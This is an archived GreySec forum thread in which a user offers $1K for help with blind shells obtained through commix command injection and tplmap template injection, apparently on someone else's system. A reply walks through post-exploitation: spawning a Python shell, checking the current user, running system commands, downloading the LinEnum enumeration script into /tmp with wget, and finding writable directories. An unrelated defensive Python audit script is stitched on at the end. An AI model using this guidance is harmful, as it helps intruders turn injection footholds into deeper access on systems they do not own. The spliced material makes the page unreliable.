GreySec Forums
Pseudo-terminal Shell.... - Printable Version

+- GreySec Forums (https://greysec.net)
+-- Forum: Technology and Miscellaneous IT-Discussion (https://greysec.net/forumdisplay.php?fid=29)
+--- Forum: Open IT-Discussion (https://greysec.net/forumdisplay.php?fid=30)
+--- Thread: Pseudo-terminal Shell.... (/showthread.php?tid=1263)



Pseudo-terminal Shell.... - naus3a - 09-09-2016

I need to get answers quick, no BS. I will pay 1K to whoever guides me through these two shells...

I am on Jabber at naus3a.rce@exploit.im
The first one is a "pseudoterminal" I got from commix, with no output, only the letters A and B.
The second shell is from tplmap. It is a blind shell with the only outputs being true & false.
I'll provide copy and paste output etc...
I'd appreciate any help. I stand by my word '1K' for a full guide on my shells.


RE: Pseudo-terminal Shell.... - Vector - 09-09-2016

If commix only gives you A and B as output it is likely you have a false positive. Just to be sure you can try the following. Given you're trying to inject commands into a *nix based OS there is a good chance they might have the Python interpreter installed. Try switching to a Python shell instead; commix comes with this option. If I recall, a Python shell is simply a Python interpreter instance with the output relayed back to your box. Once you're switched to a Python interpreter run the following:

Code:
>>> import getpass
>>> print(getpass.getuser())   # name of the account the interpreter runs as (parentheses work on Python 2 and 3)

This will print the user within whose context you are working. Let's say you're working within the context of the user/process 'apache'. If it's reasonable to assume this process can make system calls try the following:

Code:
>>> import os
>>> os.system("uname -a")   # runs the command in a subshell; its output goes to the process's stdout, the value returned is the exit status

To find out more about the box you're on. If this returns output you can run bash commands between the parentheses and quotation marks. A couple of handy bash commands to have here would include the following:

Code:
wget -O /tmp/master.zip https://github.com/rebootuser/LinEnum/archive/master.zip  # shell script for Linux enumeration, drop in /tmp/ if world-writable

tar -xvf file.tar                        # extract tar to current directory

tar -xvf archive.tar -C [destination]    # extract tar to destination

unzip file.zip -d destination_folder     # extract zip to destination_folder

which [util name]                        # i.e. 'which wget' to get path etc.

find ~                                   # lists everything under your home directory (use 'find .' for the current directory)

find /tmp/                               # lists everything under /tmp etc.

find / -perm -o=x -type d 2>/dev/null    # find world-executable (traversable) directories

find / -perm -o=wx -type d 2>/dev/null   # world-writable & executable directories

find / -writable -type d 2>/dev/null     # directories writable by the current user (for world-writable use -perm -o=w)
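As an added example (not from the thread or either poster), here is the permission check those find one-liners encode, written as a small audit script: it walks a tree, reads the mode bits directly, and separates world-writable directories that carry the sticky bit (normal for /tmp-style scratch space) from those that do not, which is the case an administrator actually wants flagged. The demo tree with its names and modes is constructed for illustration.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Audit helper (constructed for this example, not part of commix, tplmap or LinEnum).

def classify_dir(path: str) -> List[str]:
    """Return permission findings for one directory from its mode bits."""
    mode = os.lstat(path).st_mode
    if not stat.S_ISDIR(mode):
        return []
    findings = []
    world_w = bool(mode & stat.S_IWOTH)   # same test as find -perm -o=w
    world_x = bool(mode & stat.S_IXOTH)   # same test as find -perm -o=x
    sticky = bool(mode & stat.S_ISVTX)
    if world_x:
        findings.append("world-executable")
    if world_w and world_x:
        # With the sticky bit only a file's owner can remove or rename it, which
        # is what makes /tmp tolerable; without it any local user can tamper.
        findings.append("world-writable-sticky" if sticky else "world-writable-no-sticky")
    elif world_w:
        findings.append("world-writable-not-traversable")
    return findings

def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk root like `find root -type d` and keep only directories with findings."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirnames, _files in os.walk(root):
        found = classify_dir(dirpath)
        if found:
            report[os.path.relpath(dirpath, root)] = found
    return report

def demo() -> Dict[str, List[str]]:
    """Build a constructed tree with known modes and audit it."""
    root = tempfile.mkdtemp()   # created 0700, so the root itself is never reported
    for name, mode in (("scratch", 0o1777), ("dropbox", 0o777),
                       ("www", 0o755), ("private", 0o700)):
        path = os.path.join(root, name)
        os.mkdir(path)
        os.chmod(path, mode)    # explicit chmod so the umask does not mask the bits under test
    return audit_tree(root)

if __name__ == "__main__":
    for rel, found in sorted(demo().items()):
        print(rel, ", ".join(found))
```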